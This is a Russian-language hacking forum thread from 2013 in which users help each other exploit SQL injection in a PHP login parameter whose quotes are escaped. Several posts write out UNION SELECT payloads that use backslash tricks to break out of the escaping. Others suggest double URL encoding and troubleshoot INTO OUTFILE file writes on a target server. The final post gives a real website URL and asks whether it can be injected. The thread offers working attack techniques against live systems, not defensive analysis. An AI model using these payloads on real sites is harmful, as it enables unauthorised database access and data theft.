 |
|
14.11.2013, 23:43
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от qaz
есть уязвимый на скулю скрипт, типа такого
$login = $_GET['login'];
SELECT id, user_name FROM users WHERE user_login = '$login'
ковычки слешируются, как составить любой запрос на выборку данных?
Сообщение от None
SELECT id, text FROM `news` WHERE user_login =
'\' UNION SELECT 1, concat_ws(0x3a,column1,column2) from table_name; --';
____
|
|
|
14.11.2013, 23:48
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
ну также как бы будет ошибка и ничего не выведет
|
|
|
|
15.11.2013, 01:03
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от qaz
ну также как бы будет ошибка и ничего не выведет
Соглашусь, ибо потестировал!
Тебе необходимо еще одно поле (с помощью слэшей коментируется часть запроса).
Например:
Сообщение от None
SELECT id, text FROM `news` WHERE user_login =
'\' && 'UNION SELECT 1, concat_ws(0x3a,column1,column2) from table_name; --';
|
|
|
|
15.11.2013, 01:09
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Можно так-же попробовать двойным url енкодингом попробовать пронести кавычку, но это очень сомнительно, но всё-же..)
|
|
|
|
15.11.2013, 04:30
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
при попытке into outfile выскакиевает ошибка "CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[HY000]: General error". При повторном запросе того же самого запроса с тем же путем и тем же файлом, пишет "CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[HY000]: General error: 1086 File ', home=>www, pp2.txt' already exists. Файл в итоге этот все равно не создается, и несуществует (не инклудится). Пробовал разные папки и разные имена файлов. file_priv Y.
Разжуйте пожайлуста что ему ненравится тут, и что можно сделать. Спасибо
|
|
|
|
15.11.2013, 12:30
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
Сообщение от qaz
есть уязвимый на скулю скрипт, типа такого
$login = $_GET['login'];
SELECT id, user_name FROM users WHERE user_login = '$login'
ковычки слешируются, как составить любой запрос на выборку данных?
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"\' union select 1,2-- "[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
после слеширования кавычек получается
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"\\' union select 1,2-- "[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
\\ - экранированный обратный слеш.
----
Сообщение от None
при попытке into outfile выскакиевает ошибка "CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[HY000]: General error". При повторном запросе того же самого запроса с тем же путем и тем же файлом, пишет "CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[HY000]: General error: 1086 File ', home=>www, pp2.txt' already exists. Файл в итоге этот все равно не создается, и несуществует (не инклудится). Пробовал разные папки и разные имена файлов. file_priv Y.
Разжуйте пожайлуста что ему ненравится тут, и что можно сделать. Спасибо
Возможно дело в правах выставляемых на файл. То есть он создаётся, но тот от кого выполняется процесс php прочитать его не может. Может быть дело в правах на папке, пробовал /tmp? Если нет то попробуй там создать.
|
|
|
|
15.11.2013, 17:03
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Сообщение от Ganz Euler
Ganz Euler said:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"\\' union select 1,2-- "[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
\\ - экранированный обратный слеш. В итоге запрос будет выглядеть вот так:
SELECT id, user_name FROM users WHERE user_login = '\' union select 1,2--'
Т.е запись \' union select 1,2-- - обычный текст (логин).
|
|
|
|
15.11.2013, 17:14
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
Неправильно написал я немного, но по сути верно всё.
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Код:
sergey@notebook $ php test.php
\\' union select 1,2--
Т.е. запрос SELECT id, user_name FROM users WHERE user_login = ' \\' union select 1,2-- '
С точки зрения PHP правильно было бы написать мне тогда
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"\\\\' union select 1,2-- "[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
, я же написал значение переменной по факту. |
|
|
|
15.11.2013, 17:49
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Да, действительно верно, не обратил изначально внимание на сторону php В общем, чтобы запрос сработал, автору нужно в логин отправить \' и далее подставить сам запрос.
|
|
|
|
18.11.2013, 19:19
|
|
Новичок
Регистрация: 07.11.2013
Сообщений: 12
С нами:
6586166
Репутация:
0
|
|
нужна помощь ) тут есть скуль? у меня не получается раскрутить =\
Сообщение от None
http://www.circassian-genocide.com/cg-maps.php?page='&showold=yes
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
